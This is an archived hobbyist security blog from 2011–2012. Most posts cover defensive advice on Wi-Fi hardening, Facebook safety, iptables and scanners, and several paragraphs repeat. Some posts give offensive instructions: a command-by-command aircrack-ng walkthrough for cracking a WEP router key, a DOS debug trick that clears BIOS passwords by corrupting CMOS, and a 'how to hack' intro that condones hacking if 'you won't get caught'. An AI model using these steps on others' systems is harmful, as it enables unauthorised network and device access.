Most people are comfortable with the idea of installing anti-virus
software and security programs on their home PC in order to ward off
hackers and malicious code. But with the rise of smart-phone technology
people have become complacent about the safety of the personal
information that they carry around on the multi-tasking device in their
pockets. You have to think of a smart phone as a small computer which,
as with all such devices, is vulnerable to hackers unless you take steps
to protect it.
Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts
Thursday, February 2, 2012
Wednesday, February 1, 2012
Web Security Scanner For Windows (32 bit & 64 bit)

Vega is a GUI-based, multi-platform, free and open source web security scanner that can be used to find instances of SQL injection, cross-site scripting (XSS), and other vulnerabilities in your web applications. Vega also includes an intercepting proxy for interactive web application debugging. Vega attack modules are written in Javascript, users can easily modify them or write their own. This is the Windows 32-bit and 64-bit version.
Sunday, January 29, 2012
Best practices to stay safe on Facebook and avoid being hacked

As Facebook has emerged as the most
popular Social Networking site (with a user base of 800 Million active
users) it has also gained attention of hackers and spammers. As in the
case of Windows, the more popular it is, more are the chances of it
getting attacked. The reason that both Windows and Facebook are easy
target is same: it has large number of population and most of them are
common users with limited or no knowledge of “security”. It is an open
secret that people are the weakest link when it comes to security.
Keeping this in mind, I would like to request readers not to be the
weakest link and to follow these best practices to avoid being hacked:
How to enable Secure HTTPS browsing in Facebook for preventing hack?

With the
advancement of technology advanced are the dangers. On an unsecure wi-fi
connection hacking facebook is child’s play. You might have heard of “Firesheep” add on of Firefox which enables to login in to others’ opened facebook account on the same network. Apart from that, packet sniffers can also be used to steal your password on the fly. Man in the middle attacks are also very popular in the same sense.
Saturday, January 21, 2012
Microsoft Windows Remote Code Execution

VUPEN Vulnerability Research Team discovered a vulnerability in Microsoft Windows. The vulnerability is caused by a use-after-free error in the TIME (datime.dll) module when loaded via a specific behavior, which could be exploited by remote attackers to compromise a vulnerable system via a specially crafted web page.
Tuesday, December 27, 2011
How to hack keylogger/RAT's password?
Keylogger's and RAT's nowadays are everybody's problem across the internet. Hackers use keyloggers to hack the email passwords
of the victim which they receive in the form of emails or text files on
their respective FTP servers. They spread their keyloggers with the
help of cracks, keygen's or patches of popular software's or simply
through hack tools. So friends, today i will teach you how to reverse engineer the keylogger or RAT to hack the hackers FTP server or email password.
Monday, December 26, 2011
How to protect facebook timeline?
Facebook Timeline brings great new set of features to give totally a new facebook experience. The recent Facebook Christmas Theme spam gone viral couple of days ago and many profile got infected. It is important to protect your facebook timeline
against such spam attacks, as you will stand as the origin to spread
the same spam message to your friends profile. You should do little
modification of privacy settings to prevent your friends or friends of friends posting on your timeline.
Friday, December 23, 2011
How to Send Password Protected Email?

Some people send themselves important work documents by email so they can work on them at home. But most email accounts can be accessed from any computer that can connect to the Internet. With this wide access, security is a concern, especially when email is used for business. A password can protect such a business document sent in an email.
How to hack

Hacking can be difficult and there are many different ways to hack and many different exploits to use. Hacking is neither defined nor limited by exploitation or exploration. Hacking into someone else's system may be illegal, so don't do it unless you are sure you have permission from the owner of the system you are trying to hack or you are sure it's worth it AND you won't get caught.
Hacking was primarily used for learning new things about systems and computing in general, 'in the good old days'. In recent years it has taken dark connotations and in general has been looked down upon. Likewise, many corporations now employ "hackers" to test the strengths and weaknesses of their own systems. These hackers know when to stop, and it is the positive trust they have built that earn them large salaries.
There is a major difference between a hacker and a cracker. A cracker is motivated by malicious (namely: money) reasons; a hacker is attempting to gain knowledge through exploration, at any cost and in any way - not always legal. Along with the permission, you NEED TO HAVE a written consent showing proof that you got permission from that person or company.
Monday, December 19, 2011
How to protect facebook account from hackers?

Today facebook is the main target of hackers n they will post some XXX photo/video/link on your wall or send them to your friends from your account. So, here is a way to protect your account from hackers ...
Sunday, May 15, 2011
How to build powerful Linux Firewall?
Fwbuilder is a unique graphical firewall tool that allows the user to create objects and then drag and drop those objects into firewalls, to build a powerful security system for a single PC or a network of PCs. Fwbuilder supports a wide range of firewalls (Cisco ASA/PIX, Linux iptables, FreeBSD's ipfilter, OpenBSD's pf, and more), so its rules can be deployed on multiple platforms. Let's take a look at using Fwbuilder on Linux, which might just become a life-long affair with a powerful security system.
Installation of Fwbuilder is as simple as searching for "fwbuilder" (no quotes) in your Add/Remove Software tool (such as Package-Kit, Synaptic, etc) and marking Fwbuilder for installation. However, if you're installing Fwbuilder on Ubuntu, the package that will install is out of date and will not work. In order to get a working, updated Fwbuilder installed on Ubuntu, follow these steps (You will either have to su to the root user or use sudo for this to work):
Friday, April 22, 2011
What is Nesus and how to use it for scanning?
Nessus is a great tool designed to automate the testing and
discovery of known security problems. Typically someone, a hacker group,
a security company, or a researcher discovers a specific way to violate
the security of a software product. The discovery may be accidental or
through directed research; the vulnerability, in various levels of
detail, is then released to the security community. Nessus is designed
to help identify and solve these known problems, before a hacker takes
advantage of them. Nessus is a great tool with lots of capabilities.
However it is fairly complex and few articles exist to direct the new
user through the intricacies of how to install and use it. Thus, this
article shall endeavor to cover the basics of Nessus setup and
configuration. The features of the current versions of Nessus (Nessus
2.0.8a and NessusWX 1.4.4) will be discussed. Future articles will cover
Nessus in more depth.
Sunday, April 10, 2011
How to secure WiFi connection? How to Prevent WiFi hacking n their misuse?
If you were jolted by the number of blasts that rocked the country
sometime back, a police team knocking at your doors soon after could be
even more shocking. With terror outfit Indian Mujahideen raising its
ugly head time and again, using its signature style of hacking a WiFi
connection to send out an e-mail claiming credit for a terror attack,
don't be surprised if you are the unfortunate one.
Terror outfits using hacked connections are becoming increasingly rampant and there is an urgent need to secure your Internet connection. Otherwise, be prepared for some uncomfortable questions and long grilling sessions by the police should the terror email be traced to your connection.
Terror outfits using hacked connections are becoming increasingly rampant and there is an urgent need to secure your Internet connection. Otherwise, be prepared for some uncomfortable questions and long grilling sessions by the police should the terror email be traced to your connection.
Why are is it important to secure your Wifi Connection?
With traditional wired networks, it is extremely difficult for someone to steal your bandwidth but the big problem with wireless signals is that others can access the Internet using your broadband connection even while they are in a neighboring building or sitting in a car that's parked outside your apartment.
This practice, also known as piggybacking, is bad for three reasons:
With traditional wired networks, it is extremely difficult for someone to steal your bandwidth but the big problem with wireless signals is that others can access the Internet using your broadband connection even while they are in a neighboring building or sitting in a car that's parked outside your apartment.
This practice, also known as piggybacking, is bad for three reasons:
- It will increase your monthly Internet bill especially when you have to pay per byte of data transfer.
- It will decrease your Internet access speed since you are now sharing the same internet connection with other users.
- It can create a security hazard* as others may hack your computers and access your personal files through your own wireless network.
Here's a guide on how to make your Wifi tamper proof and hack proof:
Step 1. Open your router settings page
First, you need to know how to access your wireless router’s settings. Usually you can do this by typing in “192.168.1.1” into your web browser, and then enter the correct user name and password for the router. This is different for each router, so first check your router’s user manual.
You can also use Google to find the manuals for most routers online in case you lost the printed manual that came with your router purchase. For your reference, here are direct links to the manufacturer's site of some popular router brands - Linksys, Cisco, Netgear, Apple AirPort, SMC, D-Link, Buffalo, TP-LINK, 3Com, Belkin.
Step 1. Open your router settings page
First, you need to know how to access your wireless router’s settings. Usually you can do this by typing in “192.168.1.1” into your web browser, and then enter the correct user name and password for the router. This is different for each router, so first check your router’s user manual.
You can also use Google to find the manuals for most routers online in case you lost the printed manual that came with your router purchase. For your reference, here are direct links to the manufacturer's site of some popular router brands - Linksys, Cisco, Netgear, Apple AirPort, SMC, D-Link, Buffalo, TP-LINK, 3Com, Belkin.
Step 2. Create a unique password on your router
Once you have logged into your router, the first thing you should do to secure your network is to change the default password* of the router to something more secure.
This will prevent others from accessing the router and you can easily maintain the security settings that you want. You can change the password from the Administration settings on your router’s settings page. The default values are generally admin / password.
-> What do the bad guys use -This is a public database of default usernames and passwords of wireless routers, modems, switches and other networking equipment. For instance, anyone can easily make out from the database that the factory-default settings for Linksys equipment can be accessed by using admin for both username and password fields.
Once you have logged into your router, the first thing you should do to secure your network is to change the default password* of the router to something more secure.
This will prevent others from accessing the router and you can easily maintain the security settings that you want. You can change the password from the Administration settings on your router’s settings page. The default values are generally admin / password.
-> What do the bad guys use -This is a public database of default usernames and passwords of wireless routers, modems, switches and other networking equipment. For instance, anyone can easily make out from the database that the factory-default settings for Linksys equipment can be accessed by using admin for both username and password fields.
Step 3. Change your Network’s SSID name
The SSID (or Wireless Network Name) of your Wireless Router is usually pre-defined as "default" or is set as the brand name of the router (e.g., linksys). Although this will not make your network inherently* more secure, changing the SSID name of your network is a good idea as it will make it more obvious for others to know which network they are connecting to.
This setting is usually under the basic wireless settings in your router’s settings page. Once this is set, you will always be sure that you are connecting to the correct Wireless network even if there are multiple wireless networks in your area. Don't use your name, home address or other personal information in the SSID name.
-> What do the bad guys use -Wi-Fi scanning tools like inSSIDer (Windows) and Kismet (Mac, Linux) are free and they will allow anyone to find all the available Wireless Networks in an area even if the routers are not broadcasting their SSID name.
The SSID (or Wireless Network Name) of your Wireless Router is usually pre-defined as "default" or is set as the brand name of the router (e.g., linksys). Although this will not make your network inherently* more secure, changing the SSID name of your network is a good idea as it will make it more obvious for others to know which network they are connecting to.
This setting is usually under the basic wireless settings in your router’s settings page. Once this is set, you will always be sure that you are connecting to the correct Wireless network even if there are multiple wireless networks in your area. Don't use your name, home address or other personal information in the SSID name.
-> What do the bad guys use -Wi-Fi scanning tools like inSSIDer (Windows) and Kismet (Mac, Linux) are free and they will allow anyone to find all the available Wireless Networks in an area even if the routers are not broadcasting their SSID name.
Step 4. Enable Network Encryption
In order to prevent other computers in the area from using your internet connection, you need to encrypt your wireless signals.
There are several encryption methods for wireless settings, including WEP, WPA (WPA-Personal), and WPA2 (Wi-Fi Protected Access version 2). WEP is basic encryption and therefore least secure (i.e., it can be easily cracked*, but is compatible with a wide range of devices including older hardware, whereas WPA2 is the most secure but is only compatible with hardware manufactured since 2006.
To enable encryption on your Wireless network, open the wireless security settings on your router’s configuration page. This will usually let you select which security method you wish to choose; if you have older devices, choose WEP, otherwise go with WPA2. Enter a passphrase to access the network; make sure to set this to something that would be difficult for others to guess, and consider using a combination of letters, numbers, and special characters in the passphrase.
-> What do the bad guys use -AirCrack and coWPAtty are some free tools that allow even non-hackers to crack the WEP / WPA (PSK) keys using dictionary or brute force techniques. A video on YouTube suggests that AirCrack may be easily used to break WiFi encryption using a jail-broken iPhone or an iPod Touch.
In order to prevent other computers in the area from using your internet connection, you need to encrypt your wireless signals.
There are several encryption methods for wireless settings, including WEP, WPA (WPA-Personal), and WPA2 (Wi-Fi Protected Access version 2). WEP is basic encryption and therefore least secure (i.e., it can be easily cracked*, but is compatible with a wide range of devices including older hardware, whereas WPA2 is the most secure but is only compatible with hardware manufactured since 2006.
To enable encryption on your Wireless network, open the wireless security settings on your router’s configuration page. This will usually let you select which security method you wish to choose; if you have older devices, choose WEP, otherwise go with WPA2. Enter a passphrase to access the network; make sure to set this to something that would be difficult for others to guess, and consider using a combination of letters, numbers, and special characters in the passphrase.
-> What do the bad guys use -AirCrack and coWPAtty are some free tools that allow even non-hackers to crack the WEP / WPA (PSK) keys using dictionary or brute force techniques. A video on YouTube suggests that AirCrack may be easily used to break WiFi encryption using a jail-broken iPhone or an iPod Touch.
Step 5. Filter MAC addresses
Whether you have a laptop or a Wi-Fi enabled mobile phone, all your wireless devices have a unique MAC address (this has nothing to do with an Apple Mac) just like every computer connected to the Internet has a unique IP address. For an added layer of protection, you can add the MAC addresses of all your devices to your wireless router’s settings so that only the specified devices can connect to your Wi-Fi network.
MAC addresses are hard-coded into your networking equipment, so one address will only let that one device on the network. It is, unfortunately, possible to spoof a MAC address*, but an attacker must first know one of the MAC addresses of the computers that are connected to your Wireless network before he can attempt spoofing.
To enable MAC address filtering, first make a list of all your hardware devices that you want to connect to your wireless network**. Find their MAC addresses, and then add them to the MAC address filtering in your router’s administrative settings. You can find the MAC address for your computers by opening Command Prompt and typing in “ipconfig /all”, which will show your MAC address beside the name “Physical Address”. You can find the MAC addresses of Wireless mobile phones and other portable devices under their network settings, though this will vary for each device.
-> What do the bad guys use - Someone can change the MAC address of his or her own computer and can easily connect to your network since your network allows connection from devices that have that particular MAC address. Anyone can determine the MAC address of your device wireless using a sniffing tool like Nmap and he can then change the MAC address of his own computer using another free tool like MAC Shift.
Whether you have a laptop or a Wi-Fi enabled mobile phone, all your wireless devices have a unique MAC address (this has nothing to do with an Apple Mac) just like every computer connected to the Internet has a unique IP address. For an added layer of protection, you can add the MAC addresses of all your devices to your wireless router’s settings so that only the specified devices can connect to your Wi-Fi network.
MAC addresses are hard-coded into your networking equipment, so one address will only let that one device on the network. It is, unfortunately, possible to spoof a MAC address*, but an attacker must first know one of the MAC addresses of the computers that are connected to your Wireless network before he can attempt spoofing.
To enable MAC address filtering, first make a list of all your hardware devices that you want to connect to your wireless network**. Find their MAC addresses, and then add them to the MAC address filtering in your router’s administrative settings. You can find the MAC address for your computers by opening Command Prompt and typing in “ipconfig /all”, which will show your MAC address beside the name “Physical Address”. You can find the MAC addresses of Wireless mobile phones and other portable devices under their network settings, though this will vary for each device.
-> What do the bad guys use - Someone can change the MAC address of his or her own computer and can easily connect to your network since your network allows connection from devices that have that particular MAC address. Anyone can determine the MAC address of your device wireless using a sniffing tool like Nmap and he can then change the MAC address of his own computer using another free tool like MAC Shift.
Step 6. Reduce the Range of the Wireless Signal
If your wireless router has a high range but you are staying in a small studio apartment, you can consider decreasing the signal range by either changing the mode of your router to 802.11g (instead of 802.11n or 802.11b) or use a different wireless channel.
You can also try placing the router under the bed, inside a shoe box or wrap a foil around the router antennas so that you can somewhat restrict the direction of signals.
If your wireless router has a high range but you are staying in a small studio apartment, you can consider decreasing the signal range by either changing the mode of your router to 802.11g (instead of 802.11n or 802.11b) or use a different wireless channel.
You can also try placing the router under the bed, inside a shoe box or wrap a foil around the router antennas so that you can somewhat restrict the direction of signals.
Apply the Anti-Wi-Fi Paint - Researchers have developed
a special Wi-Fi blocking paint that can help you stop neighbors from
accessing your home network without you having to set up encryption at
the router level. The paint contains chemicals that blocks radio signals
by absorbing them. "By coating an entire room, Wi-Fi signals can't get
in and, crucially, can't get out."
Step 7. Upgrade your Router's firmware
You should check the manufacturer's site occasionally to make sure that your router is running the latest firmware. You can find the existing firmware version of your router using from the router's dashboard at 192.168.*.
You should check the manufacturer's site occasionally to make sure that your router is running the latest firmware. You can find the existing firmware version of your router using from the router's dashboard at 192.168.*.
Connect to your Secure Wireless Network
To conclude, MAC Address filtering with WPA2 (AES) encryption (and a really complex passphrase) is probably the best way to secure your wireless network.
Once you have enabled the various security settings in your wireless router, you need to add the new settings to your computers and other wireless devices so that they all can connect to the Wi-Fi network. You can select to have your computer automatically connect to this network, so you won’t have to enter the SSID, passphrase and other information every time you connect to the Internet.
To conclude, MAC Address filtering with WPA2 (AES) encryption (and a really complex passphrase) is probably the best way to secure your wireless network.
Once you have enabled the various security settings in your wireless router, you need to add the new settings to your computers and other wireless devices so that they all can connect to the Wi-Fi network. You can select to have your computer automatically connect to this network, so you won’t have to enter the SSID, passphrase and other information every time you connect to the Internet.
Your wireless network will now be a lot more secure and intruders may have a tough time intercepting your Wi-Fi signals.
Who is Connected to your Wireless Network
If you are worried that an outsider may be connecting to the Internet using your Wireless network, try AirSnare - it's a free utility that will look for unexpected MAC addresses on your Wireless network as well as to DHCP requests. Another option is that you open your router's administration page (using the 192.168.* address) and look for the DHCP Clients Table (it's under Status > Local Network on Linksys routers). Here you will see a list of all computers and wireless devices that are connected to your home network.
*It is also a good idea to turn off the router completely when you are not planning to use the computer for a longer period (like when you are out shopping). You save on electricity and the door remains 100% shut for wireless piggybackers.
**If you ever want to let a new device connect to your network, you will have to find its MAC address and add it to your router. If you simple want to let a friend connect to your wireless network one time, you can remove his MAC address from the router settings when he or she leaves your place.
If you are worried that an outsider may be connecting to the Internet using your Wireless network, try AirSnare - it's a free utility that will look for unexpected MAC addresses on your Wireless network as well as to DHCP requests. Another option is that you open your router's administration page (using the 192.168.* address) and look for the DHCP Clients Table (it's under Status > Local Network on Linksys routers). Here you will see a list of all computers and wireless devices that are connected to your home network.
*It is also a good idea to turn off the router completely when you are not planning to use the computer for a longer period (like when you are out shopping). You save on electricity and the door remains 100% shut for wireless piggybackers.
**If you ever want to let a new device connect to your network, you will have to find its MAC address and add it to your router. If you simple want to let a friend connect to your wireless network one time, you can remove his MAC address from the router settings when he or she leaves your place.
Thanks....
Steps to Securing Your Wireless LAN and Preventing Wireless Threats...
Wireless LANs (WLANs) bring incredible productivity and new efficiencies to organizations of all sizes. Advances in WLAN features and capabilities allow organizations to offer the benefits of wireless to their employees without sacrificing security. Properly deployed, WLANs can be as secure as wired networks. This paper discusses the five steps to creating a secure WLAN infrastructure.
WLAN deployments have increased significantly in recent years, evolving from guest access in conference rooms to limited “hot” zones of connectivity within the organization to full coverage throughout the organization. Unfortunately, many of these deployments are insecure, leaving opportunities for the curious—or malicious hackers—to try to access confidential information. Securing a WLAN is not difficult; industry advances in technology and the Cisco Unified Wireless Network make it easier than ever. Securing the network is based on extending the Cisco Self-Defending Network strategy, which is based on three pillars: secure communications, threat control and containment, and policy and compliance management. With these three areas in mind, following are best practices for securing your Cisco Unified Wireless Network.
A summary checklist of all the recommended best practices discussed in this paper follows:
- Create a WLAN security policy.
- Secure the WLAN:
– Modify the default SSID.
– Use strong encryption.
– Deploy mutual authentication between the client and the network.
– Use VPNs or WEP combined with MAC address control lists to secure business-specific devices.
– Use identity networking in combination with VLANs to restrict access to network resources.
– Ensure management ports are secured.
– Deploy lightweight access points as they do not store security information locally.
– Physically hide or secure access points to prevent tampering.
– Monitor the exterior building and site for suspicious activity.
- Secure the wired network against wireless threats:
– Deploy and enable wireless IPSs to prevent rogue access points and other wireless threats—even if you do not have a WLAN.
– Permanently remove any rogue devices using location tracking.
- Defend against external threats:
– Equip mobile devices with similar security services as the company network (firewalls, VPNs, antivirus software, etc.).
– Ensure mobile device security policy compliance with Cisco NAC.
- Enlist employees in safeguarding the network through education.
SOURCE : Cisco System
Thanks....
Friday, April 8, 2011
Monday, April 4, 2011
Linux Firewalls – Attack detection and response with iptables, PSAD, and FWSNORT.
I seem to work best at night, it’s dark out, and generally quite dark inside too; there is more bandwidth because it is off peek, and in general there is nobody coming over or phoning and interrupting me. Incidentally, its also when I do the majority of my reading, at home; in bed, at night. Much more pleasant that way…
PSAD
Linux Firewalls takes you right from the very start of how iptables works to manually porting Snort rules over to iptables for detection, and in my humble opinion, it does a damn good job of it. In fact, it done such a good job of it, I have used the reference firewall scripts and PSAD configurations to install and configure iptables and PSAD on my new VPS, which I will hopefully be moving some of my sites to.
Some of the things you should probably have already if you want to get the best out of Linux Firewalls is…
- A comfortable familiarity with the distribution of Linux you wish to use.
- Basic understanding of how networks communicate.
- Reasonable understanding of how TCP works (ie. the three way handshake)
- Reasonable understanding of how UDP works
- A system to test this stuff on, if you don’t have a system to test this stuff out on, you could always set up a few virtual machines using VirtualBox or VMWare.
- A will to learn about this kind of stuff
Missing any one of these things (except the will to learn, thats pretty important) probably isn’t going to be a huge deal, but if your missing a lot of them, you might struggle a bit with some of the concepts.
#!/bin/sh #Port and IP addresses changed to protect the innocent. IPTABLES=/sbin/iptables MODPROBE=/sbin/modprobe ### Flush existing rules and settings. Set to default drop. echo "[+] Flushing existing iptables rules..." $IPTABLES -F $IPTABLES -X #$IPTABLES -t nat -F CLICK HERE TO DOWNLOAD FULL SCRIPT (1.82KB)
Thanks...
Wednesday, March 30, 2011
How to crack BIOS password?
There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.
Follow the steps below:
1) Boot up windows.
2) Go to dos-prompt or go to command prompt directly from the windows start up menu.
2) Go to dos-prompt or go to command prompt directly from the windows start up menu.
3) Type the command at the prompt: “debug” (without quotes)
4) type the following lines now exactly as given…….
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit
5) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!
EnjoYYYYYYYYYY
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….
Thanks....
Saturday, March 26, 2011
How to Hack Wireless Router using Ubuntu?
First we need to install the necessary Ubuntu packages. This can be done with the Synaptic Package Manager (search for aircrack-ng and kismet) or using the Terminal.
$sudo apt-get install aircrack-ng$sudo apt-get install kismet
Let's start by testing the wireless card:
$sudo airmon-ng stop ath0$sudo airmon-ng start wifi0
Let's see all available wireless networks. Let's choose a wireless network with a good signal quality and with clients connected to it. Keep in mind the channel id (i.e. 6 or 11) and the router Mac Address.
$sudo airodump-ng mon0
Next step is to intercept data/packages we will need a bunch of IV's logged so we can decrypt the password later.
Usually 250k or 500k are enough, sometimes the aircrack after failing deciphering the password will ask for 5.000 to 10.000 IV's.
Let's start logging using the following command (6 stands for channel id and 00:MA:CA:DD:RE:SS for the router mac address.
$sudo airdump-ng -c 6 --bssid 00:MA:CA:DD:RE:SS -w dump mon0
The final step, run this command to decipher the password.
$sudo aircrack-ng -a 1 -f 10 dump*.cap
The result shoud be:
KEY FOUND! **:**:**:**:** ASCII: ******
Decrypted correctly: 100%
If you get:
Failed. Next try with 5.000 IV's or .... Failed. Next try with 10.000
Then just collect more packages with
$sudo airdump-ng -c 6 --bssid 00:MA:CA:DD:RE:SS -w dump mon0
SOLUTION:
THERE is no safe way or 100% effective method of protecting a wireless network. The best recommendation is to avoid at all cost WEP keys and implement a WAP encryption.
Avoid WAP using only pre-shared key, they are also known to be exploited. Instead try to implement WAPv2, the key will change dynamically and the encryption is stronger...
Thanks...
Thanks...
Tuesday, March 22, 2011
Linux Firewalls – Attack detection and response with iptables, PSAD, and FWSNORT.
I seem to work best at night, it’s dark out, and generally quite dark inside too; there is more bandwidth because it is off peek, and in general there is nobody coming over or phoning and interrupting me. Incidentally, its also when I do the majority of my reading, at home; in bed, at night. Much more pleasant that way…
PSAD
Anyway, the latest tut I have been post is called “Linux Firewalls – Attack detection and response with iptables, PSAD and FWSNORT” – the site where PSAD, FWSNORT and a fair few other Linux and security tools are developed. Now, you may think that with a title like that your going to have to know a lot about Linux and Firewalls before you begin but that is simply not true, Linux Firewalls takes you right from the very start of how iptables works to manually porting Snort rules over to iptables for detection, and in my humble opinion, it does a damn good job of it. In fact, it done such a good job of it, I have used the reference firewall scripts and PSAD configurations to install and configure iptables and PSAD on my new VPS, which I will hopefully be moving some of my sites to.
PSAD
Anyway, the latest tut I have been post is called “Linux Firewalls – Attack detection and response with iptables, PSAD and FWSNORT” – the site where PSAD, FWSNORT and a fair few other Linux and security tools are developed. Now, you may think that with a title like that your going to have to know a lot about Linux and Firewalls before you begin but that is simply not true, Linux Firewalls takes you right from the very start of how iptables works to manually porting Snort rules over to iptables for detection, and in my humble opinion, it does a damn good job of it. In fact, it done such a good job of it, I have used the reference firewall scripts and PSAD configurations to install and configure iptables and PSAD on my new VPS, which I will hopefully be moving some of my sites to.
Some of the things you should probably have already if you want to get the best out of Linux Firewalls is…
- A comfortable familiarity with the distribution of Linux you wish to use.
- Basic understanding of how networks communicate.
- Reasonable understanding of how TCP works (ie. the three way handshake)
- Reasonable understanding of how UDP works
- A system to test this stuff on, if you don’t have a system to test this stuff out on, you could always set up a few virtual machines using VirtualBox or VMWare.
- A will to learn about this kind of stuff
Missing any one of these things (except the will to learn, thats pretty important) probably isn’t going to be a huge deal, but if your missing a lot of them, you might struggle a bit with some of the concepts.
Here is a sample of one of the basic Linux Firewall scripts that I have adapted from the book…
#!/bin/sh
#Port and IP addresses changed to protect the innocent.
IPTABLES=/sbin/iptables
MODPROBE=/sbin/modprobe
### Flush existing rules and settings. Set to default drop.
echo "[+] Flushing existing iptables rules..."
$IPTABLES -F
$IPTABLES -X
#$IPTABLES -t nat -F
CLICK HERE TO DOWNLOAD FULL SCRIPT (1.82KB)
I hope that this imprompt topics at least some help to you.
Thnks...
Subscribe to:
Posts (Atom)
Thursday, February 02, 2012
Anu

















